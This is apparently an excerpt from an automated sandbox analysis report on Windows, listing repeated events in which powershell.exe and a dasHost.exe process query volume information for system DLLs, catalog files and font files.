                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
